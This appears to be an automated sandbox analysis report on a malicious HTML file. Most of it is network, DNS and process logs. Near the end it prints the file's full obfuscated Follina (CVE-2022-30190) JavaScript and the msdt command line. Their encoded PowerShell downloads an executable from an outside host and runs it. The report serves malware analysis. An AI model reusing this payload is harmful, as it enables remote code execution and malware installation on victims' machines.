Sep 2, 2022 15:29:58.076863050 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:29:58.077224016 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:29:58.077243090 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:29:58.127197027 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:29:58.155210972 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:29:58.155257940 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:29:58.155771017 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:29:58.163119078 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:29:58.163317919 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:29:58.208867073 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:30:08.124836922 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:30:08.125193119 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:30:08.125253916 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:30:53.141551971 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:30:53.141625881 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
Sep 2, 2022 15:31:38.253438950 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36
Sep 2, 2022 15:31:38.253495932 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 2, 2022 15:28:54.772237062 CEST | 51139 | 53 | 192.168.2.3 | 8.8.8.8
Sep 2, 2022 15:28:54.772720098 CEST | 52955 | 53 | 192.168.2.3 | 8.8.8.8
Sep 2, 2022 15:28:54.799750090 CEST | 53 | 52955 | 8.8.8.8 | 192.168.2.3
Sep 2, 2022 15:28:54.801990986 CEST | 53 | 51139 | 8.8.8.8 | 192.168.2.3
Sep 2, 2022 15:28:57.896194935 CEST | 57704 | 53 | 192.168.2.3 | 8.8.8.8
Sep 2, 2022 15:28:57.915808916 CEST | 53 | 57704 | 8.8.8.8 | 192.168.2.3
Sep 2, 2022 15:29:57.981518030 CEST | 58119 | 53 | 192.168.2.3 | 8.8.8.8
Sep 2, 2022 15:29:58.001106977 CEST | 53 | 58119 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 2, 2022 15:28:54.772237062 CEST | 192.168.2.3 | 8.8.8.8 | 0x5880 | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001)
Sep 2, 2022 15:28:54.772720098 CEST | 192.168.2.3 | 8.8.8.8 | 0xbec1 | Standard query (0) | accounts.google.com | A (IP address) | IN (0x0001)
Sep 2, 2022 15:28:57.896194935 CEST | 192.168.2.3 | 8.8.8.8 | 0x7fb0 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)
Sep 2, 2022 15:29:57.981518030 CEST | 192.168.2.3 | 8.8.8.8 | 0x9f76 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 2, 2022 15:28:54.799750090 CEST | 8.8.8.8 | 192.168.2.3 | 0xbec1 | No error (0) | accounts.google.com | - | 216.58.215.237 | A (IP address) | IN (0x0001)
Sep 2, 2022 15:28:54.801990986 CEST | 8.8.8.8 | 192.168.2.3 | 0x5880 | No error (0) | clients2.google.com | clients.l.google.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 2, 2022 15:28:54.801990986 CEST | 8.8.8.8 | 192.168.2.3 | 0x5880 | No error (0) | clients.l.google.com | - | 172.217.168.78 | A (IP address) | IN (0x0001)
Sep 2, 2022 15:28:57.915808916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7fb0 | No error (0) | www.google.com | - | 172.217.168.36 | A (IP address) | IN (0x0001)
Sep 2, 2022 15:29:58.001106977 CEST | 8.8.8.8 | 192.168.2.3 | 0x9f76 | No error (0) | www.google.com | - | 172.217.168.36 | A (IP address) | IN (0x0001)

• accounts.google.com
• clients2.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49750 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-02 13:28:56 UTC | 0 | OUT | POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
Host: accounts.google.com
Connection: keep-alive
Content-Length: 1
Origin: https://www.google.com
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2022-09-02 13:28:56 UTC | 0 | OUT | Data Raw: 20
Data Ascii: 
2022-09-02 13:28:56 UTC | 3 | IN | HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: https://www.google.com
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 02 Sep 2022 13:28:56 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
Content-Security-Policy: script-src 'report-sample' 'nonce-0X5lVZWT_mNw5ovhaKMYPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-09-02 13:28:56 UTC | 4 | IN | Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
Data Ascii: 11["gaia.l.a.r",[]]
2022-09-02 13:28:56 UTC | 4 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49749 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-02 13:28:56 UTC | 0 | OUT | GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
Host: clients2.google.com
Connection: keep-alive
X-Goog-Update-Interactivity: fg
X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
X-Goog-Update-Updater: chromecrx-104.0.5112.81
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2022-09-02 13:28:56 UTC | 1 | IN | HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-2NqIu_3Ygyr6l2RUZH06pw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 02 Sep 2022 13:28:56 GMT
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5723
X-Daystart: 23336
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-09-02 13:28:56 UTC | 2 | IN | Data Raw: 32 63 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 37 32 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 33 33 33 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
Data Ascii: 2ca<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5723" elapsed_seconds="23336"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2022-09-02 13:28:56 UTC | 2 | IN | Data Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f
Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></
2022-09-02 13:28:56 UTC | 3 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 15:28:47
Start date: 02/09/2022
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Imagebase: 0x7ff614650000
File size: 2851656 bytes
MD5 hash: 0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 2
Start time: 15:28:52
Start date: 02/09/2022
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
Imagebase: 0x7ff614650000
File size: 2851656 bytes
MD5 hash: 0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 3
Start time: 15:28:52
Start date: 02/09/2022
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
Imagebase: 0x7ff614650000
File size: 2851656 bytes
MD5 hash: 0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 16
Start time: 15:29:57
Start date: 02/09/2022
Path: C:\Windows\System32\msdt.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'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'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
Imagebase: 0x7ff7d5070000
File size: 1560576 bytes
MD5 hash: 8BE43BAF1F37DA5AB31A53CA1C07EE0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate

                                                              Call Graph


                                                              Script:

                                                              location.href = "mS-" + "msDt:" + "/I" + "d" + " " + "Pcw" + "Dia" + "gnOs" + "ti" + "c" + " " + "-sk" + "IP" + " " + "FOR" + "C" + "E" + " " + "-pa" + "raM" + " " + "\"" + "It_ReBrOwsef" + "oR" + "fIL" + "E" + "=" + "#fbK" + " " + "IT_LaunchMethod=ContextMen" + "u" + " " + "IT_" + "B" + "rows" + "eForF" + "ile" + "=" + "I" + "$(" + "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiL" + "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBz" + "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly" + "9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNM" + "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+" + "[Char]34+'))" + "'))))" + "T" + "i" + "/../../../" + "../../../../../../../" + ".mS" + "i" + " " + "\"";